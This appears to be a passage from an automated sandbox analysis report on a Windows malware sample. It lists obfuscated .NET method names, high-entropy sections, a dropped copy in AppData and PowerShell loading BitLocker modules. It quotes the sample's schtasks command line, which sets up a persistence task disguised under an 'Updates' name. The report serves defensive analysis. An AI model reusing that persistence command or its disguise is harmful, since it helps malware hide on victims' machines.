Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CAE622 push dword ptr [ebx+ebp-75h]; iretd	10_2_07CAE62D
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CA7997 push 14051E24h; retf	10_2_07CA79A5

Source: OtldpQxzAw.exe	Static PE information: section name: .text entropy: 7.768214272073572
Source: wiSeRRwvZHTk.exe.0.dr	Static PE information: section name: .text entropy: 7.768214272073572

Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, iyRDUvZ4Ql0hY9J1Nh.cs	High entropy of concatenated method names: 'mESwFoCwaG', 'HruwmCHidE', 'xGiwemkZMF', 'EK1wPJTA9V', 'g1xwl1FtAC', 'dgDwNrHT6F', 'I2F9WU7KGyqRK64IGA', 'zEaQrSaj7kklOROmcA', 'glZwwVI7go', 'mZxwJKk9Xe'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, su51c4wZKBuBe5J40Lx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yenWyijEIF', 'eIcWkCjpRx', 'JESWVuhe35', 'aD8WWGcH8l', 'stMWnb5bHo', 'oPTWIDXwM2', 'EadWcidb4O'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, dJ1kuKwwP91Iw7LtDF4.cs	High entropy of concatenated method names: 'rRXk6cumxq', 'QbHkzabe7T', 'Du2Vu78kDs', 'nrWVwgmmEJ', 'HB2Vbiuib0', 'vd2VJ2IseC', 'RyuVZhie2n', 'ueMVRY0jBb', 'lWNVqGvcTp', 'RZhVsROjIo'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, KUYvd8wJZPHjhsCd0KK.cs	High entropy of concatenated method names: 'ND2V6B4iGi', 'OgsVzPt8ov', 'obMWurWdVV', 'aqe4mZbXLIaHWFsoWVn', 'cBEx4MbYCpc7vqNtsSG', 'zVnB3FbSFo4iZA7Q8Ji', 'wX2kLcbIl1gfVqPvBCk', 'GIT8RIb2gjBaRpWfApT'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, L1onYL6owfuoodx0rs.cs	High entropy of concatenated method names: 'pDkkBaeFF6', 'S3HkSmMkNv', 'CbGkvi2Pr9', 'W6PkF48Kp6', 'iL1kyKYxbS', 'EWYkmArGe5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, HyMjg377Jhn8qLwe5x.cs	High entropy of concatenated method names: 'IHHyQ9kJn7', 'DcWydlN5n1', 'WAiyLapob5', 'UUByoSiwv9', 'DCcyOE0cnO', 'zXfyHIZO7D', 'cZFyYR3ppV', 'i0OyC0TuKa', 'n4oyrlu54R', 'D37yGk2r0X'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, YMFwXZztGIHUqCTCse.cs	High entropy of concatenated method names: 'nAdkhksrbT', 'pXDkfKJCCn', 'b05k113SMI', 'CWPkQXabjN', 'XPQkdP3dsQ', 'e7ykoGGrCp', 'mLkkOg5QUm', 'lt3kc66cip', 'O7lk9snTVO', 'S3sk3sAbLF'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, QVhNaVwupe9wfSM2wEY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yujk8pbjEm', 'plGkxxooUT', 'Hy9kArCewl', 'UXnkpR4Z1x', 'jtPkKB5F9p', 'W1qk2hGXyn', 'i2vk0XJjdN'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, EIuit6pGcY0I90xR9d.cs	High entropy of concatenated method names: 'VJLlGX3Khy', 'm1Vlx1gIfv', 'f83lpUJpNa', 'oJnlKOYKX5', 'dCWld0cko7', 'R0NlLYIEmr', 'frLlo7H6YJ', 'ijdlO2l9QF', 'XNIlHicasU', 'cQDlYwoEmH'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, FWd2Tws8fJEwcpmeXS.cs	High entropy of concatenated method names: 'Dispose', 'w6jw78ZrSo', 'glabdLgX58', 'V2tIGPEwBT', 'rpEw6hVfce', 'frMwzy5y7C', 'ProcessDialogKey', 'XmdbuyMjg3', 'YJhbwn8qLw', 'l5xbbC1onY'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, TIKABW2vA20UYP6642.cs	High entropy of concatenated method names: 'ToString', 'EstN8mOyWe', 'LxZNdFyTjR', 'aK4NLuoVky', 'z76NoyixW5', 'COyNOTDyFN', 'TGZNHMZuw1', 'AieNYbPUtV', 'tt5NC439nb', 'dNfNr85Bvn'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, G6q7T6Yqbf9pkf5fm1.cs	High entropy of concatenated method names: 'cv9Fq6acq0', 'ISRFB2Es7n', 'NohFvY4Vqp', 'dtYv6qdQpe', 'Wj8vzMD60r', 'NciFuYOinW', 'bhIFwpPka1', 'vY3Fba7clr', 'nIFFJK4NFF', 'MNOFZw3Kw0'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, PS5LecrS9vdcv5KjVP.cs	High entropy of concatenated method names: 'E2kF9IWZch', 'Wk5F3pnCeM', 'ThaFEIbFnj', 'ic5FafpqdK', 'CtTFj7DW3a', 'iH4FhU27Mt', 'jjPFUmka4X', 'MOFFf3herb', 'RY5F17dUDj', 'IuEF5TodrP'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, mRLBHK09Fp3QY0ak7q.cs	High entropy of concatenated method names: 'MXx4e40rdN', 'ddW4PMMBbF', 'ToString', 'POY4qZasLI', 'eRb4sF31xZ', 'RPt4BmAHVU', 'EpH4SCGiTK', 'vPL4vpSFMD', 'Ya54FlJ7ge', 'FCG4m8Q00U'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	High entropy of concatenated method names: 'e7dJRtBUgK', 'fCRJqCbo8G', 'jsjJshsc8B', 'cr7JBTgHe3', 'HdIJShxpXw', 'y8oJvAAiXn', 'XJ6JFkbdPj', 'OosJmuELmr', 'gYHJgfUh1y', 'notJeYhq6Y'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, xotDjBAXlboKjPaFnk.cs	High entropy of concatenated method names: 'L7FXfSn3B2', 'BFZX1Bvxxt', 'rOCXQA7TsI', 'XiLXd0hvP5', 'PtFXo5mOSr', 'IxTXOtU2og', 'jvPXYc3X2v', 'w8uXCDjtSc', 'hAfXG81djO', 'OagX8qB51r'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, ioCwaGfdruCHidE4Gk.cs	High entropy of concatenated method names: 'ro0sp3E7V1', 'PkcsKtEUdg', 'h7rs2aNFIY', 'WYKs0H3GOI', 'X95sMlgLTl', 'JfdsipJOe3', 'qylstQGCJe', 'K2bsDkAGbd', 'Girs72Nlqu', 'AYvs6SRV0V'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, qA9VZV5DCST9Ms1x1F.cs	High entropy of concatenated method names: 'qeJSjcpaiT', 'CnqSUKDPGw', 'FiUBLBenJ7', 's0xBon9xTy', 'hpMBONRZ8A', 'sGwBHvyxkd', 'wJEBYRgP74', 'NLYBCX9HJS', 'wHrBrYqUjn', 'fLpBGQeZoD'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, bm5CM2bmHEx5Y3Jyjk.cs	High entropy of concatenated method names: 'h8GEBEMld', 'HNUaUbEQ3', 'nXXh5Hn77', 'VVqUdp8Ne', 'B2q15tYO9', 'MKa5A4ZwC', 'TohCtIX6CiuV3JUgNe', 'Q9ljoVY9bqIJoeGmOu', 'kFrTY7TZZ', 'DM4kf1AAc'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, VACZgDQrHT6F0vZlW0.cs	High entropy of concatenated method names: 'IsGvRKFFJU', 'AYYvsqma45', 'mblvSaU2lk', 'myovFLHEEi', 'k7dvmrmMwf', 'dc6SMCnTFl', 'zcnSiouQWj', 'faeSt9baOa', 'oJcSDflilm', 'o8TS7vNoCb'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, xXXA4etICI6j8ZrSoT.cs	High entropy of concatenated method names: 'FTZyldmSgw', 'DXey4Y3I7S', 'Bgcyydlnmi', 'v1nyVUgmXG', 'sqWynZDn3i', 'mNMycgX90a', 'Dispose', 'pU8TqBL5DB', 'Ao1TsnYuYK', 'xkETBuC5Fi'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, JI1copiplbLsacxPHL.cs	High entropy of concatenated method names: 'Gx34DdI2qK', 'uni46rS3uf', 'wGATuDGcgn', 'gftTwkmGsG', 'DxG48eDkG1', 'mCE4xnatTy', 'y7j4AlvwU0', 'tE64pbk4Qo', 'zNa4KSKIul', 'IY542DbkfF'
Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, fh8Df91GimkZMF1K1J.cs	High entropy of concatenated method names: 'QqkBanXbEM', 'gBIBhAFUsB', 'E1lBfyhTvq', 'OOGB1KDTMC', 'Fc3BlI35VY', 'olyBNfoS4o', 'eO8B47a1NS', 'euwBTAIHrh', 'sZMByj2XFx', 'EUYBk7LBdg'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, iyRDUvZ4Ql0hY9J1Nh.cs	High entropy of concatenated method names: 'mESwFoCwaG', 'HruwmCHidE', 'xGiwemkZMF', 'EK1wPJTA9V', 'g1xwl1FtAC', 'dgDwNrHT6F', 'I2F9WU7KGyqRK64IGA', 'zEaQrSaj7kklOROmcA', 'glZwwVI7go', 'mZxwJKk9Xe'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, su51c4wZKBuBe5J40Lx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yenWyijEIF', 'eIcWkCjpRx', 'JESWVuhe35', 'aD8WWGcH8l', 'stMWnb5bHo', 'oPTWIDXwM2', 'EadWcidb4O'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, dJ1kuKwwP91Iw7LtDF4.cs	High entropy of concatenated method names: 'rRXk6cumxq', 'QbHkzabe7T', 'Du2Vu78kDs', 'nrWVwgmmEJ', 'HB2Vbiuib0', 'vd2VJ2IseC', 'RyuVZhie2n', 'ueMVRY0jBb', 'lWNVqGvcTp', 'RZhVsROjIo'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, KUYvd8wJZPHjhsCd0KK.cs	High entropy of concatenated method names: 'ND2V6B4iGi', 'OgsVzPt8ov', 'obMWurWdVV', 'aqe4mZbXLIaHWFsoWVn', 'cBEx4MbYCpc7vqNtsSG', 'zVnB3FbSFo4iZA7Q8Ji', 'wX2kLcbIl1gfVqPvBCk', 'GIT8RIb2gjBaRpWfApT'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, L1onYL6owfuoodx0rs.cs	High entropy of concatenated method names: 'pDkkBaeFF6', 'S3HkSmMkNv', 'CbGkvi2Pr9', 'W6PkF48Kp6', 'iL1kyKYxbS', 'EWYkmArGe5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, HyMjg377Jhn8qLwe5x.cs	High entropy of concatenated method names: 'IHHyQ9kJn7', 'DcWydlN5n1', 'WAiyLapob5', 'UUByoSiwv9', 'DCcyOE0cnO', 'zXfyHIZO7D', 'cZFyYR3ppV', 'i0OyC0TuKa', 'n4oyrlu54R', 'D37yGk2r0X'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, YMFwXZztGIHUqCTCse.cs	High entropy of concatenated method names: 'nAdkhksrbT', 'pXDkfKJCCn', 'b05k113SMI', 'CWPkQXabjN', 'XPQkdP3dsQ', 'e7ykoGGrCp', 'mLkkOg5QUm', 'lt3kc66cip', 'O7lk9snTVO', 'S3sk3sAbLF'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, QVhNaVwupe9wfSM2wEY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yujk8pbjEm', 'plGkxxooUT', 'Hy9kArCewl', 'UXnkpR4Z1x', 'jtPkKB5F9p', 'W1qk2hGXyn', 'i2vk0XJjdN'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, EIuit6pGcY0I90xR9d.cs	High entropy of concatenated method names: 'VJLlGX3Khy', 'm1Vlx1gIfv', 'f83lpUJpNa', 'oJnlKOYKX5', 'dCWld0cko7', 'R0NlLYIEmr', 'frLlo7H6YJ', 'ijdlO2l9QF', 'XNIlHicasU', 'cQDlYwoEmH'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, FWd2Tws8fJEwcpmeXS.cs	High entropy of concatenated method names: 'Dispose', 'w6jw78ZrSo', 'glabdLgX58', 'V2tIGPEwBT', 'rpEw6hVfce', 'frMwzy5y7C', 'ProcessDialogKey', 'XmdbuyMjg3', 'YJhbwn8qLw', 'l5xbbC1onY'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, TIKABW2vA20UYP6642.cs	High entropy of concatenated method names: 'ToString', 'EstN8mOyWe', 'LxZNdFyTjR', 'aK4NLuoVky', 'z76NoyixW5', 'COyNOTDyFN', 'TGZNHMZuw1', 'AieNYbPUtV', 'tt5NC439nb', 'dNfNr85Bvn'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, G6q7T6Yqbf9pkf5fm1.cs	High entropy of concatenated method names: 'cv9Fq6acq0', 'ISRFB2Es7n', 'NohFvY4Vqp', 'dtYv6qdQpe', 'Wj8vzMD60r', 'NciFuYOinW', 'bhIFwpPka1', 'vY3Fba7clr', 'nIFFJK4NFF', 'MNOFZw3Kw0'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, PS5LecrS9vdcv5KjVP.cs	High entropy of concatenated method names: 'E2kF9IWZch', 'Wk5F3pnCeM', 'ThaFEIbFnj', 'ic5FafpqdK', 'CtTFj7DW3a', 'iH4FhU27Mt', 'jjPFUmka4X', 'MOFFf3herb', 'RY5F17dUDj', 'IuEF5TodrP'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, mRLBHK09Fp3QY0ak7q.cs	High entropy of concatenated method names: 'MXx4e40rdN', 'ddW4PMMBbF', 'ToString', 'POY4qZasLI', 'eRb4sF31xZ', 'RPt4BmAHVU', 'EpH4SCGiTK', 'vPL4vpSFMD', 'Ya54FlJ7ge', 'FCG4m8Q00U'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	High entropy of concatenated method names: 'e7dJRtBUgK', 'fCRJqCbo8G', 'jsjJshsc8B', 'cr7JBTgHe3', 'HdIJShxpXw', 'y8oJvAAiXn', 'XJ6JFkbdPj', 'OosJmuELmr', 'gYHJgfUh1y', 'notJeYhq6Y'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, xotDjBAXlboKjPaFnk.cs	High entropy of concatenated method names: 'L7FXfSn3B2', 'BFZX1Bvxxt', 'rOCXQA7TsI', 'XiLXd0hvP5', 'PtFXo5mOSr', 'IxTXOtU2og', 'jvPXYc3X2v', 'w8uXCDjtSc', 'hAfXG81djO', 'OagX8qB51r'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, ioCwaGfdruCHidE4Gk.cs	High entropy of concatenated method names: 'ro0sp3E7V1', 'PkcsKtEUdg', 'h7rs2aNFIY', 'WYKs0H3GOI', 'X95sMlgLTl', 'JfdsipJOe3', 'qylstQGCJe', 'K2bsDkAGbd', 'Girs72Nlqu', 'AYvs6SRV0V'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, qA9VZV5DCST9Ms1x1F.cs	High entropy of concatenated method names: 'qeJSjcpaiT', 'CnqSUKDPGw', 'FiUBLBenJ7', 's0xBon9xTy', 'hpMBONRZ8A', 'sGwBHvyxkd', 'wJEBYRgP74', 'NLYBCX9HJS', 'wHrBrYqUjn', 'fLpBGQeZoD'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, bm5CM2bmHEx5Y3Jyjk.cs	High entropy of concatenated method names: 'h8GEBEMld', 'HNUaUbEQ3', 'nXXh5Hn77', 'VVqUdp8Ne', 'B2q15tYO9', 'MKa5A4ZwC', 'TohCtIX6CiuV3JUgNe', 'Q9ljoVY9bqIJoeGmOu', 'kFrTY7TZZ', 'DM4kf1AAc'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, VACZgDQrHT6F0vZlW0.cs	High entropy of concatenated method names: 'IsGvRKFFJU', 'AYYvsqma45', 'mblvSaU2lk', 'myovFLHEEi', 'k7dvmrmMwf', 'dc6SMCnTFl', 'zcnSiouQWj', 'faeSt9baOa', 'oJcSDflilm', 'o8TS7vNoCb'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, xXXA4etICI6j8ZrSoT.cs	High entropy of concatenated method names: 'FTZyldmSgw', 'DXey4Y3I7S', 'Bgcyydlnmi', 'v1nyVUgmXG', 'sqWynZDn3i', 'mNMycgX90a', 'Dispose', 'pU8TqBL5DB', 'Ao1TsnYuYK', 'xkETBuC5Fi'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, JI1copiplbLsacxPHL.cs	High entropy of concatenated method names: 'Gx34DdI2qK', 'uni46rS3uf', 'wGATuDGcgn', 'gftTwkmGsG', 'DxG48eDkG1', 'mCE4xnatTy', 'y7j4AlvwU0', 'tE64pbk4Qo', 'zNa4KSKIul', 'IY542DbkfF'
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, fh8Df91GimkZMF1K1J.cs	High entropy of concatenated method names: 'QqkBanXbEM', 'gBIBhAFUsB', 'E1lBfyhTvq', 'OOGB1KDTMC', 'Fc3BlI35VY', 'olyBNfoS4o', 'eO8B47a1NS', 'euwBTAIHrh', 'sZMByj2XFx', 'EUYBk7LBdg'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, iyRDUvZ4Ql0hY9J1Nh.cs	High entropy of concatenated method names: 'mESwFoCwaG', 'HruwmCHidE', 'xGiwemkZMF', 'EK1wPJTA9V', 'g1xwl1FtAC', 'dgDwNrHT6F', 'I2F9WU7KGyqRK64IGA', 'zEaQrSaj7kklOROmcA', 'glZwwVI7go', 'mZxwJKk9Xe'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, su51c4wZKBuBe5J40Lx.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yenWyijEIF', 'eIcWkCjpRx', 'JESWVuhe35', 'aD8WWGcH8l', 'stMWnb5bHo', 'oPTWIDXwM2', 'EadWcidb4O'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, dJ1kuKwwP91Iw7LtDF4.cs	High entropy of concatenated method names: 'rRXk6cumxq', 'QbHkzabe7T', 'Du2Vu78kDs', 'nrWVwgmmEJ', 'HB2Vbiuib0', 'vd2VJ2IseC', 'RyuVZhie2n', 'ueMVRY0jBb', 'lWNVqGvcTp', 'RZhVsROjIo'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, KUYvd8wJZPHjhsCd0KK.cs	High entropy of concatenated method names: 'ND2V6B4iGi', 'OgsVzPt8ov', 'obMWurWdVV', 'aqe4mZbXLIaHWFsoWVn', 'cBEx4MbYCpc7vqNtsSG', 'zVnB3FbSFo4iZA7Q8Ji', 'wX2kLcbIl1gfVqPvBCk', 'GIT8RIb2gjBaRpWfApT'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, L1onYL6owfuoodx0rs.cs	High entropy of concatenated method names: 'pDkkBaeFF6', 'S3HkSmMkNv', 'CbGkvi2Pr9', 'W6PkF48Kp6', 'iL1kyKYxbS', 'EWYkmArGe5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, HyMjg377Jhn8qLwe5x.cs	High entropy of concatenated method names: 'IHHyQ9kJn7', 'DcWydlN5n1', 'WAiyLapob5', 'UUByoSiwv9', 'DCcyOE0cnO', 'zXfyHIZO7D', 'cZFyYR3ppV', 'i0OyC0TuKa', 'n4oyrlu54R', 'D37yGk2r0X'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, YMFwXZztGIHUqCTCse.cs	High entropy of concatenated method names: 'nAdkhksrbT', 'pXDkfKJCCn', 'b05k113SMI', 'CWPkQXabjN', 'XPQkdP3dsQ', 'e7ykoGGrCp', 'mLkkOg5QUm', 'lt3kc66cip', 'O7lk9snTVO', 'S3sk3sAbLF'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, QVhNaVwupe9wfSM2wEY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yujk8pbjEm', 'plGkxxooUT', 'Hy9kArCewl', 'UXnkpR4Z1x', 'jtPkKB5F9p', 'W1qk2hGXyn', 'i2vk0XJjdN'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, EIuit6pGcY0I90xR9d.cs	High entropy of concatenated method names: 'VJLlGX3Khy', 'm1Vlx1gIfv', 'f83lpUJpNa', 'oJnlKOYKX5', 'dCWld0cko7', 'R0NlLYIEmr', 'frLlo7H6YJ', 'ijdlO2l9QF', 'XNIlHicasU', 'cQDlYwoEmH'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, FWd2Tws8fJEwcpmeXS.cs	High entropy of concatenated method names: 'Dispose', 'w6jw78ZrSo', 'glabdLgX58', 'V2tIGPEwBT', 'rpEw6hVfce', 'frMwzy5y7C', 'ProcessDialogKey', 'XmdbuyMjg3', 'YJhbwn8qLw', 'l5xbbC1onY'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, TIKABW2vA20UYP6642.cs	High entropy of concatenated method names: 'ToString', 'EstN8mOyWe', 'LxZNdFyTjR', 'aK4NLuoVky', 'z76NoyixW5', 'COyNOTDyFN', 'TGZNHMZuw1', 'AieNYbPUtV', 'tt5NC439nb', 'dNfNr85Bvn'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, G6q7T6Yqbf9pkf5fm1.cs	High entropy of concatenated method names: 'cv9Fq6acq0', 'ISRFB2Es7n', 'NohFvY4Vqp', 'dtYv6qdQpe', 'Wj8vzMD60r', 'NciFuYOinW', 'bhIFwpPka1', 'vY3Fba7clr', 'nIFFJK4NFF', 'MNOFZw3Kw0'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, PS5LecrS9vdcv5KjVP.cs	High entropy of concatenated method names: 'E2kF9IWZch', 'Wk5F3pnCeM', 'ThaFEIbFnj', 'ic5FafpqdK', 'CtTFj7DW3a', 'iH4FhU27Mt', 'jjPFUmka4X', 'MOFFf3herb', 'RY5F17dUDj', 'IuEF5TodrP'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, mRLBHK09Fp3QY0ak7q.cs	High entropy of concatenated method names: 'MXx4e40rdN', 'ddW4PMMBbF', 'ToString', 'POY4qZasLI', 'eRb4sF31xZ', 'RPt4BmAHVU', 'EpH4SCGiTK', 'vPL4vpSFMD', 'Ya54FlJ7ge', 'FCG4m8Q00U'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	High entropy of concatenated method names: 'e7dJRtBUgK', 'fCRJqCbo8G', 'jsjJshsc8B', 'cr7JBTgHe3', 'HdIJShxpXw', 'y8oJvAAiXn', 'XJ6JFkbdPj', 'OosJmuELmr', 'gYHJgfUh1y', 'notJeYhq6Y'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, xotDjBAXlboKjPaFnk.cs	High entropy of concatenated method names: 'L7FXfSn3B2', 'BFZX1Bvxxt', 'rOCXQA7TsI', 'XiLXd0hvP5', 'PtFXo5mOSr', 'IxTXOtU2og', 'jvPXYc3X2v', 'w8uXCDjtSc', 'hAfXG81djO', 'OagX8qB51r'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, ioCwaGfdruCHidE4Gk.cs	High entropy of concatenated method names: 'ro0sp3E7V1', 'PkcsKtEUdg', 'h7rs2aNFIY', 'WYKs0H3GOI', 'X95sMlgLTl', 'JfdsipJOe3', 'qylstQGCJe', 'K2bsDkAGbd', 'Girs72Nlqu', 'AYvs6SRV0V'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, qA9VZV5DCST9Ms1x1F.cs	High entropy of concatenated method names: 'qeJSjcpaiT', 'CnqSUKDPGw', 'FiUBLBenJ7', 's0xBon9xTy', 'hpMBONRZ8A', 'sGwBHvyxkd', 'wJEBYRgP74', 'NLYBCX9HJS', 'wHrBrYqUjn', 'fLpBGQeZoD'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, bm5CM2bmHEx5Y3Jyjk.cs	High entropy of concatenated method names: 'h8GEBEMld', 'HNUaUbEQ3', 'nXXh5Hn77', 'VVqUdp8Ne', 'B2q15tYO9', 'MKa5A4ZwC', 'TohCtIX6CiuV3JUgNe', 'Q9ljoVY9bqIJoeGmOu', 'kFrTY7TZZ', 'DM4kf1AAc'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, VACZgDQrHT6F0vZlW0.cs	High entropy of concatenated method names: 'IsGvRKFFJU', 'AYYvsqma45', 'mblvSaU2lk', 'myovFLHEEi', 'k7dvmrmMwf', 'dc6SMCnTFl', 'zcnSiouQWj', 'faeSt9baOa', 'oJcSDflilm', 'o8TS7vNoCb'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, xXXA4etICI6j8ZrSoT.cs	High entropy of concatenated method names: 'FTZyldmSgw', 'DXey4Y3I7S', 'Bgcyydlnmi', 'v1nyVUgmXG', 'sqWynZDn3i', 'mNMycgX90a', 'Dispose', 'pU8TqBL5DB', 'Ao1TsnYuYK', 'xkETBuC5Fi'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, JI1copiplbLsacxPHL.cs	High entropy of concatenated method names: 'Gx34DdI2qK', 'uni46rS3uf', 'wGATuDGcgn', 'gftTwkmGsG', 'DxG48eDkG1', 'mCE4xnatTy', 'y7j4AlvwU0', 'tE64pbk4Qo', 'zNa4KSKIul', 'IY542DbkfF'
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, fh8Df91GimkZMF1K1J.cs	High entropy of concatenated method names: 'QqkBanXbEM', 'gBIBhAFUsB', 'E1lBfyhTvq', 'OOGB1KDTMC', 'Fc3BlI35VY', 'olyBNfoS4o', 'eO8B47a1NS', 'euwBTAIHrh', 'sZMByj2XFx', 'EUYBk7LBdg'

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

File created: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wiSeRRwvZHTk" /XML "C:\Users\user\AppData\Local\Temp\tmp53CF.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
